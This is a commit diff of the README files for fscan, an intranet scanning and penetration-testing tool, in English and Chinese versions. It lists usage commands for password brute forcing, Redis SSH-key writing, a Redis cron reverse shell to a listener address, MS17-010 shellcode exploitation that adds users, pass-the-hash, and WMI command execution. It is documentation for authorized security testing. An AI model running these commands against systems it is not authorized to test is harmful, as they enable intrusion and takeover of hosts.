mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update readme

Browse Source
This commit is contained in:
Budi Komarudin 2025-03-19 06:42:24 +00:00
parent cb6d67ed7b
commit 2e44374863
3 changed files with 535 additions and 537 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

474
README.md
View File

@ -1,338 +1,258 @@
# Fscan 2.0.0
[English][url-docen]
[English](README.md) | [中文](README_CN.md)
# 0x00 新增功能
# 1. Introduction
An intranet comprehensive scanning tool, designed for automated and comprehensive vulnerability scanning of internal networks.
It supports host survival detection, port scanning, common service brute force, ms17010 vulnerability detection, Redis batch public key writing, scheduled task rebound shell, Windows network card information collection, web fingerprint identification, web vulnerability scanning, NetBIOS detection, domain controller identification, and many other functions.
1、UI/UX 优化
# 2. Functions
1. Information collection:
* Host survival detection (ICMP)
* Port scanning
2、增加修改-f -o参数-f支持txt/csv/json输出格式优化
2. Brute force attacks:
* Various service password brute forcing (SSH, SMB, RDP, etc.)
* Database password brute forcing (MySQL, MSSQL, Redis, PostgreSQL, Oracle, etc.)
3、增加端口指纹识别功能。
3. System information and vulnerability scanning:
* NetBIOS detection and domain controller identification
* Network Interface Card (NIC) information collection
* High-risk vulnerability scanning (MS17010, etc.)
4、增加本地信息搜集模块增加本地域控探测模块增加本地Minidump模块
4. Web detection:
* Web title detection
* Web fingerprinting (CMS, OA frameworks, etc.)
* Web vulnerability scanning (WebLogic, Struts2, etc., also supports XRay POC)
5、增加Telnet、VNC、Elasticsearch、RabbitMQ、Kafka、ActiveMQ、LDAP、SMTP、IMAP、POP3、SNMP、Zabbix、Modbus、Rsync、Cassandra、Neo4j扫描。
5. Exploitation:
* Redis public key writing and scheduled task creation
* SSH command execution
* MS17010 vulnerability exploitation (shellcode implantation), such as adding users
6、架构重构以反射+插件模块构建
7、增加-log参数支持INFOSUCCESS、ERROR、DEBUG参数用于调试具体信息。
8、优化线程现在会以更好的多线程运行
**新版由于对旧版代码进行了全面的重构难免会有Bug请在遇到Bug时提交Issue会尽快修复处理感谢。**
**欢迎提交新的插件模块,目前插件为快速热插拔形式,适用于简易开发。**
# 0x01 简介
一款功能丰富的内网综合扫描工具,提供一键自动化、全方位的漏洞扫描能力。
## 主要功能
- 主机存活探测:快速识别内网中的活跃主机
- 端口扫描:全面检测目标主机开放端口
- 服务爆破:支持对常见服务进行密码爆破测试
- 漏洞利用集成MS17-010等高危漏洞检测
- Redis利用支持批量写入公钥进行权限获取
- 系统信息收集可读取Windows网卡信息
- Web应用检测
- Web指纹识别
- Web漏洞扫描
- 域环境探测:
- NetBIOS信息获取
- 域控制器识别
- 后渗透功能支持通过计划任务实现反弹shell
# 0x02 主要功能
## 1. 信息搜集
- 基于ICMP的主机存活探测快速识别网络中的活跃主机设备
- 全面的端口扫描:系统地检测目标主机的开放端口情况
## 2. 爆破功能
- 常用服务密码爆破支持SSH、SMB、RDP等多种协议的身份认证测试
- 数据库密码爆破覆盖MySQL、MSSQL、Redis、PostgreSQL、Oracle等主流数据库系统
## 3. 系统信息与漏洞扫描
- 网络信息收集包括NetBIOS探测和域控制器识别
- 系统信息获取:能够读取目标系统网卡配置信息
- 安全漏洞检测支持MS17-010等高危漏洞的识别与检测
## 4. Web应用探测
- 网站信息收集:自动获取网站标题信息
- Web指纹识别可识别常见CMS系统与OA框架
- 漏洞扫描能力集成WebLogic、Struts2等漏洞检测兼容XRay POC
## 5. 漏洞利用模块
- Redis利用支持写入公钥或植入计划任务
- SSH远程执行提供SSH命令执行功能
- MS17-010利用支持ShellCode注入可实现添加用户等操作
## 6. 辅助功能
- 扫描结果存储:将所有检测结果保存至文件,便于后续分析
# 0x03 使用说明
## 基础扫描配置
**以下参数由于重构原因并不能保证每一个参数都可以正常运行出现问题请及时提交Issue。**
**目标配置**
6. Other features:
* Save output results to file
# 3. Instructions
### Getting Started
```
-h 指定目标(支持格式:192.168.1.1/24, 192.168.1.1-255, 192.168.1.1,192.168.1.2)
-eh 排除特定目标
-hf 从文件导入目标
fscan.exe -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/16
```
**端口配置**
### Advanced Usage
```
-p 指定端口范围(默认常用端口),如: -p 22,80,3306 或 -p 1-65535
-portf 从文件导入端口列表
fscan.exe -h 192.168.1.1/24 -np -no -nopoc # Skip survival detection, do not save output, skip web POC scanning
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub # Redis write public key
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 # Redis scheduled task rebound shell
fscan.exe -h 192.168.1.1/24 -c whoami # Execute SSH command
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 # Specify SSH module and port
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt # Load usernames and passwords from files
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt # Specify output file path (default is current directory)
fscan.exe -h 192.168.1.1/8 # Scan the first and last IP of each C segment for quick network segment assessment
fscan.exe -h 192.168.1.1/24 -m smb -pwd password # SMB password brute force
fscan.exe -h 192.168.1.1/24 -m ms17010 # Scan for MS17010 vulnerability
fscan.exe -hf ip.txt # Import targets from file
fscan.exe -u http://baidu.com -proxy 8080 # Scan a URL with HTTP proxy
fscan.exe -h 192.168.1.1/24 -nobr -nopoc # Skip brute force and web POC scanning to reduce traffic
fscan.exe -h 192.168.1.1/24 -pa 3389 # Add RDP scanning (port 3389)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 # Use SOCKS5 proxy (only for basic TCP functions)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add # Use MS17010 to add a user
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx # SMB hash pass-the-hash
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx # WMI command execution (no echo)
fscan.exe -h 192.168.1.1/24 -m webonly # Skip port scanning and directly scan web services
```
## 认证配置
**用户名密码**
### Compilation Instructions
```
-user 指定用户名
-pwd 指定密码
-userf 用户名字典文件
-pwdf 密码字典文件
-usera 添加额外用户名
-pwda 添加额外密码
-domain 指定域名
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe # Optional, for compression
```
**SSH相关**
### Installation for Arch Linux Users
```
-sshkey SSH私钥路径
-c SSH连接后执行的命令
yay -S fscan-git # or paru -S fscan-git
```
## 扫描控制
**扫描模式**
### Complete Parameter List
```
-m 指定扫描模式(默认为All)
-t 线程数(默认60)
-time 超时时间(默认3秒)
-top 存活检测结果展示数量(默认10)
-np 跳过存活检测
-ping 使用ping代替ICMP
-skip 跳过指纹识别
Usage of ./fscan:
-br int
Brute force threads (default 1)
-c string
Execute command (ssh|wmiexec)
-cookie string
Set POC cookie, e.g., -cookie rememberMe=login
-debug int
Log error frequency (default 60)
-dns
Use DNS log for POC
-domain string
SMB domain
-full
Full POC scan, e.g., all 100 Shiro keys
-h string
Target IP address range, e.g., 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hash string
NTLM hash for pass-the-hash
-hf string
Host file, e.g., -hf ip.txt
-hn string
Hosts to exclude, e.g., -hn 192.168.1.1/24
-m string
Select scan module, e.g., -m ssh (default "all")
-no
Do not save output log
-nobr
Do not perform brute force password attacks
-nopoc
Do not scan for web vulnerabilities
-np
Do not perform ping checks
-num int
POC scan rate (default 20)
-o string
Output file (default "result.txt")
-p string
Port selection, e.g., 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
Add ports to default port list, e.g., -pa 3389
-path string
Remote file path for FCGI, SMB
-ping
Use ping instead of ICMP
-pn string
Ports to exclude, e.g., -pn 445
-pocname string
Filter POCs by name, e.g., -pocname weblogic
-pocpath string
POC file path
-portf string
Port file
-proxy string
Set HTTP proxy for POC, e.g., -proxy http://127.0.0.1:8080
-pwd string
Password
-pwda string
Add password to default list, e.g., -pwda password
-pwdf string
Password file
-rf string
Redis file to write SSH key, e.g., -rf id_rsa.pub
-rs string
Redis shell for cron job, e.g., -rs 192.168.1.1:6666
-sc string
MS17010 shellcode action, e.g., -sc add
-silent
Silent scan mode
-socks5 string
SOCKS5 proxy for TCP connections (timeout settings won't work with proxy)
-sshkey string
SSH private key file (id_rsa)
-t int
Number of threads (default 600)
-time int
Connection timeout in seconds (default 3)
-top int
Show top N live hosts (default 10)
-u string
URL to scan
-uf string
URL file
-user string
Username
-usera string
Add username to default list, e.g., -usera user
-userf string
Username file
-wmi
Use WMI
-wt int
Web request timeout in seconds (default 5)
```
## Web扫描配置
# 4. Demo Screenshots
```
-u 指定单个URL扫描
-uf 从文件导入URL列表
-cookie 设置Cookie
-wt Web请求超时时间(默认5秒)
```
## 代理设置
```
-proxy HTTP代理(如: http://127.0.0.1:8080)
-socks5 SOCKS5代理(如: 127.0.0.1:1080)
```
## POC扫描配置
```
-pocpath POC文件路径
-pocname 指定POC名称
-full 启用完整POC扫描
-dns 启用DNS日志
-num POC并发数(默认20)
```
## Redis利用配置
```
-rf Redis文件名
-rs Redis Shell配置
-noredis 禁用Redis检测
```
## 输出控制
```
-o 输出文件路径(默认关闭)
-f 输出格式(默认txt)
-no 禁用结果保存
-silent 静默模式
-nocolor 禁用彩色输出
-json JSON格式输出
-log 日志级别设置
-pg 显示扫描进度条
```
## 其他配置
```
-local 本地模式
-nobr 禁用暴力破解
-retry 最大重试次数(默认3次)
-path 远程路径配置
-hash 哈希值
-hashf 哈希文件
-sc Shellcode配置
-wmi 启用WMI
-lang 语言设置(默认zh)
```
**以上参数由于重构原因并不能保证每一个参数都可以正常运行出现问题请及时提交Issue。**
## 编译说明
```bash
# 基础编译
go build -ldflags="-s -w" -trimpath main.go
# UPX压缩可选
upx -9 fscan
```
## 系统安装
```bash
# Arch Linux
yay -S fscan-git
# 或
paru -S fscan-git
```
# 0x04 运行截图
`fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)`
`fscan.exe -h 192.168.x.x (Full scan with MS17010, NIC information)`
![](image/1.png)
![](image/4.png)
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)`
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (Redis write public key)`
![](image/2.png)
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
`fscan.exe -h 192.168.x.x -c "whoami;id" (SSH command execution)`
![](image/3.png)
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (XRay POC support)`
![](image/2020-12-12-13-34-44.png)
`fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)`
`fscan.exe -h 192.168.x.x -p 139 (NetBIOS and domain controller detection, [+]DC indicates domain controller)`
![](image/netbios.png)
`go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
`go run .\main.go -h 192.168.x.x/24 -m netbios (Show complete NetBIOS information)`
![](image/netbios1.png)
`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
![img.png](image/live.png)
`go run .\main.go -h 192.0.0.0/8 -m icmp (Network segmentation summary)`
![](image/live.png)
新的展示
# 5. Disclaimer
![2.0-1](image/2.0-1.png)
This tool is intended **only for legally authorized** enterprise security testing activities. If you want to test this tool, please set up your own target environment.
![2.0-2](image/2.0-2.png)
To prevent malicious use, all POCs included in this project are theoretical vulnerability assessments and do not exploit vulnerabilities or launch actual attacks against targets.
# 0x05 免责声明
When using this tool, ensure your actions comply with local laws and regulations and that you have obtained proper authorization. **Do not scan unauthorized targets**.
本工具仅面向**合法授权**的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
If you engage in any illegal activities while using this tool, you bear full responsibility for the consequences. We accept no legal or joint liability.
为避免被恶意使用本项目所有收录的poc均为漏洞的理论判断不存在漏洞利用过程不会对目标发起真实攻击和漏洞利用。
Before installing and using this tool, please **carefully read and fully understand all terms of this agreement**. Important clauses regarding limitations, exemptions, and your rights may be highlighted in bold or underlined text.
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
Unless you have fully read, understood, and accepted all terms of this agreement, do not install or use this tool. Your use of this tool or acceptance of this agreement in any express or implied manner constitutes your agreement to be bound by these terms.
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
在安装并使用本工具前,请您**务必审慎阅读、充分理解各条款内容**,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
# 0x06 404StarLink 2.0 - Galaxy
# 6. 404StarLink 2.0 - Galaxy
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
Fscan is a member of the 404Team [404StarLink2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) project. If you have questions about fscan or want to connect with other users, you can join the community:
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
演示视频[【安全工具】5大功能一键化内网扫描神器——404星链计划fscan](https://www.bilibili.com/video/BV1Cv4y1R72M)
# 0x07 安全培训
![img.png](image/5.png)
学网络安全,就选玲珑安全!专业漏洞挖掘,精准定位风险;助力技能提升,塑造安全精英;玲珑安全,为您的数字世界保驾护航!
在线免费学习网络安全涵盖src漏洞挖掘0基础安全入门。适用于小白进阶高手: https://space.bilibili.com/602205041
玲珑安全往期学员报喜🎉: https://www.ifhsec.com/list.html
玲珑安全漏洞挖掘培训学习联系微信: linglongsec
# 0x08 Star Chart
# 7. Star Chart
[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
# 0x09 捐赠
如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 [点我](image/sponsor.png)
# 8. Donation
If you find this project helpful, you can buy the author a drink 🍹 [click here](image/sponsor.png)
# 0x10 参考链接
# 9. Reference Links
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
# 0x11 最近更新
## 2025 更新
- 添加插件
## 2024 更新
- **2024/12/19**: v2.0.0 重大更新
- 完整代码重构,提升性能和可维护性
- 重新设计模块化架构,支持插件扩展
- 改进并发控制,提升扫描效率
## 2023 更新
- **2023/11/13**:
- 新增控制台颜色输出(可用 `-nocolor` 关闭)
- 支持JSON格式保存结果`-json`
- 调整TLS最低版本至1.0
- 支持端口分组(`-p db,web,service`
## 2022 更新
- **2022/11/19**: 新增hash碰撞和wmiexec无回显命令执行功能
- **2022/7/14**: 改进文件导入支持和搜索匹配功能
- **2022/7/6**: 优化内存管理扩展URL支持
- **2022/7/2**:
- 增强POC fuzz模块
- 新增MS17017利用功能
- 加入socks5代理支持
- **2022/4/20**: 新增POC路径指定和端口文件导入功能
- **2022/2/25**: 新增webonly模式致谢 @AgeloVito
- **2022/1/11**: 新增Oracle密码爆破
- **2022/1/7**: 改进大规模网段扫描新增LiveTop功能
## 2021 更新
- **2021/12/7**: 新增RDP扫描功能
- **2021/12/1**: 全面优化功能模块
- **2021/6/18**: 改进POC识别机制
- **2021/5/29**: 新增FCGI未授权扫描
- **2021/5/15**: 发布Windows 2003版本
- **2021/5/6**: 更新核心模块
- **2021/4/21**: 加入NetBIOS探测和域控识别
- **2021/3/4**: 支持URL批量扫描
- **2021/2/25**: 支持密码爆破功能
- **2021/2/8**: 新增指纹识别功能
- **2021/2/5**: 优化ICMP探测
## 2020 更新
- **2020/12/12**: 集成YAML解析引擎支持XRay POC
- **2020/12/6**: 优化ICMP模块
- **2020/12/03**: 改进IP段处理
- **2020/11/17**: 新增WebScan模块
- **2020/11/16**: 优化ICMP模块
- **2020/11/15**: 支持文件导入IP
_感谢所有为项目做出贡献的开发者_
[url-docen]: README_EN.md
# 10. Version History
- **2022/11/19** - Added hash collision and wmiexec command execution without echo
- **2022/07/14** - Added -hf parameter support for host:port format, changed rule.Search regular matching to include headers+body
- **2022/07/06** - Added manual garbage collection, URL comma separation support, fixed POC module bugs
- **2022/07/02** - Enhanced POC fuzzy module, added MS17010 exploitation with shellcode, added support for socks5 proxy
- **2022/04/20** - Added -path parameter for custom POC paths, -portf for port files, improved RDP module multithreading
- **2022/02/25** - Added -m webonly option to skip port scanning
- **2022/01/11** - Added Oracle password brute force support
- **2022/01/07** - Improved scanning for /8 networks, added LiveTop function to show top active segments
- **2021/12/07** - Added RDP scanning and -pa port parameter
- **2021/12/01** - Optimized XRay parsing, added HTTPS detection, improved IP parsing, added Docker unauthorized access detection
- **2021/06/18** - Improved POC mechanism based on fingerprint identification
- **2021/05/29** - Added FCGI unauthorized command execution, SSH private key authentication
- **2021/05/15** - Added Win03 version, silent scanning mode, web fingerprinting, fixed NetBIOS module
- **2021/05/06** - Updated module libraries, POCs, and fingerprints, improved thread processing
- **2021/04/22** - Modified webtitle module with GBK decoding
- **2021/04/21** - Added NetBIOS detection and domain controller identification
- **2021/03/04** - Added support for URL scanning with -u and -uf parameters
- **2021/02/25** - Modified YAML parsing for password brute force attacks
- **2021/02/08** - Added fingerprint identification for common CMS and frameworks
- **2021/02/05** - Improved ICMP packet handling for large-scale scanning
- **2020/12/12** - Added YAML parsing engine supporting XRay POCs
- **2020/12/06** - Optimized ICMP module, added -domain parameter for SMB
- **2020/12/03** - Improved IP range processing, ICMP and port scanning modules
- **2020/11/17** - Added -ping parameter as alternative to ICMP, added WebScan module and Shiro detection
- **2020/11/16** - Optimized ICMP module with -it parameter
- **2020/11/15** - Added support for importing IPs from file with -hf

338
README_CN.md Normal file
View File

@ -0,0 +1,338 @@
# Fscan 2.0.0
[English](README.md) | [中文](README_CN.md)
# 0x00 新增功能
1、UI/UX 优化
2、增加修改-f -o参数-f支持txt/csv/json输出格式优化
3、增加端口指纹识别功能。
4、增加本地信息搜集模块增加本地域控探测模块增加本地Minidump模块
5、增加Telnet、VNC、Elasticsearch、RabbitMQ、Kafka、ActiveMQ、LDAP、SMTP、IMAP、POP3、SNMP、Zabbix、Modbus、Rsync、Cassandra、Neo4j扫描。
6、架构重构以反射+插件模块构建
7、增加-log参数支持INFOSUCCESS、ERROR、DEBUG参数用于调试具体信息。
8、优化线程现在会以更好的多线程运行
**新版由于对旧版代码进行了全面的重构难免会有Bug请在遇到Bug时提交Issue会尽快修复处理感谢。**
**欢迎提交新的插件模块,目前插件为快速热插拔形式,适用于简易开发。**
# 0x01 简介
一款功能丰富的内网综合扫描工具,提供一键自动化、全方位的漏洞扫描能力。
## 主要功能
- 主机存活探测:快速识别内网中的活跃主机
- 端口扫描:全面检测目标主机开放端口
- 服务爆破:支持对常见服务进行密码爆破测试
- 漏洞利用集成MS17-010等高危漏洞检测
- Redis利用支持批量写入公钥进行权限获取
- 系统信息收集可读取Windows网卡信息
- Web应用检测
- Web指纹识别
- Web漏洞扫描
- 域环境探测:
- NetBIOS信息获取
- 域控制器识别
- 后渗透功能支持通过计划任务实现反弹shell
# 0x02 主要功能
## 1. 信息搜集
- 基于ICMP的主机存活探测快速识别网络中的活跃主机设备
- 全面的端口扫描:系统地检测目标主机的开放端口情况
## 2. 爆破功能
- 常用服务密码爆破支持SSH、SMB、RDP等多种协议的身份认证测试
- 数据库密码爆破覆盖MySQL、MSSQL、Redis、PostgreSQL、Oracle等主流数据库系统
## 3. 系统信息与漏洞扫描
- 网络信息收集包括NetBIOS探测和域控制器识别
- 系统信息获取:能够读取目标系统网卡配置信息
- 安全漏洞检测支持MS17-010等高危漏洞的识别与检测
## 4. Web应用探测
- 网站信息收集:自动获取网站标题信息
- Web指纹识别可识别常见CMS系统与OA框架
- 漏洞扫描能力集成WebLogic、Struts2等漏洞检测兼容XRay POC
## 5. 漏洞利用模块
- Redis利用支持写入公钥或植入计划任务
- SSH远程执行提供SSH命令执行功能
- MS17-010利用支持ShellCode注入可实现添加用户等操作
## 6. 辅助功能
- 扫描结果存储:将所有检测结果保存至文件,便于后续分析
# 0x03 使用说明
## 基础扫描配置
**以下参数由于重构原因并不能保证每一个参数都可以正常运行出现问题请及时提交Issue。**
**目标配置**
```
-h 指定目标(支持格式:192.168.1.1/24, 192.168.1.1-255, 192.168.1.1,192.168.1.2)
-eh 排除特定目标
-hf 从文件导入目标
```
**端口配置**
```
-p 指定端口范围(默认常用端口),如: -p 22,80,3306 或 -p 1-65535
-portf 从文件导入端口列表
```
## 认证配置
**用户名密码**
```
-user 指定用户名
-pwd 指定密码
-userf 用户名字典文件
-pwdf 密码字典文件
-usera 添加额外用户名
-pwda 添加额外密码
-domain 指定域名
```
**SSH相关**
```
-sshkey SSH私钥路径
-c SSH连接后执行的命令
```
## 扫描控制
**扫描模式**
```
-m 指定扫描模式(默认为All)
-t 线程数(默认60)
-time 超时时间(默认3秒)
-top 存活检测结果展示数量(默认10)
-np 跳过存活检测
-ping 使用ping代替ICMP
-skip 跳过指纹识别
```
## Web扫描配置
```
-u 指定单个URL扫描
-uf 从文件导入URL列表
-cookie 设置Cookie
-wt Web请求超时时间(默认5秒)
```
## 代理设置
```
-proxy HTTP代理(如: http://127.0.0.1:8080)
-socks5 SOCKS5代理(如: 127.0.0.1:1080)
```
## POC扫描配置
```
-pocpath POC文件路径
-pocname 指定POC名称
-full 启用完整POC扫描
-dns 启用DNS日志
-num POC并发数(默认20)
```
## Redis利用配置
```
-rf Redis文件名
-rs Redis Shell配置
-noredis 禁用Redis检测
```
## 输出控制
```
-o 输出文件路径(默认关闭)
-f 输出格式(默认txt)
-no 禁用结果保存
-silent 静默模式
-nocolor 禁用彩色输出
-json JSON格式输出
-log 日志级别设置
-pg 显示扫描进度条
```
## 其他配置
```
-local 本地模式
-nobr 禁用暴力破解
-retry 最大重试次数(默认3次)
-path 远程路径配置
-hash 哈希值
-hashf 哈希文件
-sc Shellcode配置
-wmi 启用WMI
-lang 语言设置(默认zh)
```
**以上参数由于重构原因并不能保证每一个参数都可以正常运行出现问题请及时提交Issue。**
## 编译说明
```bash
# 基础编译
go build -ldflags="-s -w" -trimpath main.go
# UPX压缩可选
upx -9 fscan
```
## 系统安装
```bash
# Arch Linux
yay -S fscan-git
# 或
paru -S fscan-git
```
# 0x04 运行截图
`fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)`
![](image/1.png)
![](image/4.png)
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)`
![](image/2.png)
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
![](image/3.png)
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
![](image/2020-12-12-13-34-44.png)
`fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)`
![](image/netbios.png)
`go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)`
![](image/netbios1.png)
`go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
![img.png](image/live.png)
新的展示
![2.0-1](image/2.0-1.png)
![2.0-2](image/2.0-2.png)
# 0x05 免责声明
本工具仅面向**合法授权**的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
为避免被恶意使用本项目所有收录的poc均为漏洞的理论判断不存在漏洞利用过程不会对目标发起真实攻击和漏洞利用。
在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。**请勿对非授权目标进行扫描。**
如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
在安装并使用本工具前,请您**务必审慎阅读、充分理解各条款内容**,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
# 0x06 404StarLink 2.0 - Galaxy
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
演示视频[【安全工具】5大功能一键化内网扫描神器——404星链计划fscan](https://www.bilibili.com/video/BV1Cv4y1R72M)
# 0x07 安全培训
![img.png](image/5.png)
学网络安全,就选玲珑安全!专业漏洞挖掘,精准定位风险;助力技能提升,塑造安全精英;玲珑安全,为您的数字世界保驾护航!
在线免费学习网络安全涵盖src漏洞挖掘0基础安全入门。适用于小白进阶高手: https://space.bilibili.com/602205041
玲珑安全往期学员报喜🎉: https://www.ifhsec.com/list.html
玲珑安全漏洞挖掘培训学习联系微信: linglongsec
# 0x08 Star Chart
[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
# 0x09 捐赠
如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 [点我](image/sponsor.png)
# 0x10 参考链接
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
# 0x11 最近更新
## 2025 更新
- 添加插件
## 2024 更新
- **2024/12/19**: v2.0.0 重大更新
- 完整代码重构,提升性能和可维护性
- 重新设计模块化架构,支持插件扩展
- 改进并发控制,提升扫描效率
## 2023 更新
- **2023/11/13**:
- 新增控制台颜色输出(可用 `-nocolor` 关闭)
- 支持JSON格式保存结果`-json`
- 调整TLS最低版本至1.0
- 支持端口分组(`-p db,web,service`
## 2022 更新
- **2022/11/19**: 新增hash碰撞和wmiexec无回显命令执行功能
- **2022/7/14**: 改进文件导入支持和搜索匹配功能
- **2022/7/6**: 优化内存管理扩展URL支持
- **2022/7/2**:
- 增强POC fuzz模块
- 新增MS17017利用功能
- 加入socks5代理支持
- **2022/4/20**: 新增POC路径指定和端口文件导入功能
- **2022/2/25**: 新增webonly模式致谢 @AgeloVito
- **2022/1/11**: 新增Oracle密码爆破
- **2022/1/7**: 改进大规模网段扫描新增LiveTop功能
## 2021 更新
- **2021/12/7**: 新增RDP扫描功能
- **2021/12/1**: 全面优化功能模块
- **2021/6/18**: 改进POC识别机制
- **2021/5/29**: 新增FCGI未授权扫描
- **2021/5/15**: 发布Windows 2003版本
- **2021/5/6**: 更新核心模块
- **2021/4/21**: 加入NetBIOS探测和域控识别
- **2021/3/4**: 支持URL批量扫描
- **2021/2/25**: 支持密码爆破功能
- **2021/2/8**: 新增指纹识别功能
- **2021/2/5**: 优化ICMP探测
## 2020 更新
- **2020/12/12**: 集成YAML解析引擎支持XRay POC
- **2020/12/6**: 优化ICMP模块
- **2020/12/03**: 改进IP段处理
- **2020/11/17**: 新增WebScan模块
- **2020/11/16**: 优化ICMP模块
- **2020/11/15**: 支持文件导入IP
_感谢所有为项目做出贡献的开发者_
[url-docen]: README_EN.md

260
README_EN.md
View File

@ -1,260 +0,0 @@
# fscan
[中文][url-doczh]
# 1. Introduction
An intranet comprehensive scanning tool, which is convenient for automatic and omnidirectional missed scanning.
It supports host survival detection, port scanning, explosion of common services, ms17010, Redis batch public key writing, planned task rebound shell, reading win network card information, web fingerprint identification, web vulnerability scanning, netbios detection, domain control identification and other functions.
# 2. Functions
1.Information collection:
* Survival detection(icmp)
* Port scanning
2.Blasting:
* Various service blasting(ssh、smb、rdp, etc.)
* Database password blasting(mysql、mssql、redis、psql、oracle, etc.)
3.System information, vulnerability scanning:
* Netbios detection, domain control identification
* Collect NIC information
* High Risk Vulnerability Scanning(ms17010, etc.)
4.Web detection:
* Webtitle detection
* Web fingerprinting (cms, oa framework, etc.)
* Web vulnerability scanning (weblogic, st2, etc., also supports xray poc)
5.Exploit:
* Write redis public key and scheduled tasks
* Excute ssh command
* Use the ms17017 vulnerability (implanted shellcode), such as adding users, etc.
6.Others:
* Save ouput result
# 3. Instructions
Getting Started
```
fscan.exe -h 192.168.1.1/24
fscan.exe -h 192.168.1.1/16
```
Advanced
```
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(Skip survival detection, do not save output result, skip web poc scanning)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (Redis write public key)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (Redis scheduled task rebound shell)
fscan.exe -h 192.168.1.1/24 -c whoami (Execute ssh command)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (Specify ssh module and port)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (Load the specified file and password to blast
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (Specify the path to save the scan results, which is saved in the current path by default)
fscan.exe -h 192.168.1.1/8 192.x.x.1 and 192.x.x.254 of segment A, convenient for quickly viewing network segment information )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (Smb password crash)
fscan.exe -h 192.168.1.1/24 -m ms17010 (Specified ms17010 module)
fscan.exe -hf ip.txt (Import target from file)
